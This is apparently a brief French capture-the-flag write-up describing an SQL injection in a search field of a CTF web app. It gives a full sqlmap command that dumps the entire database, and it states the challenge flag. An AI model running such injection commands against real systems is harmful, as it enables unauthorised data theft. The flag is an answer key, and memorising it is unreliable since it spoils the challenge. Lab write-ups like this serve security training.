Writeup
=======

Exploitation d'une SQLi dans le champ de recherche.

Exploitation&nbsp;: voir exploit.py 
ou 
$sqlmap -u "http://zoocheck.ensibs.ctf/animaux.php?d=1*" --dump-all



Flag&nbsp;: `ENSIBS{-*-P!nkPanther-*-}`
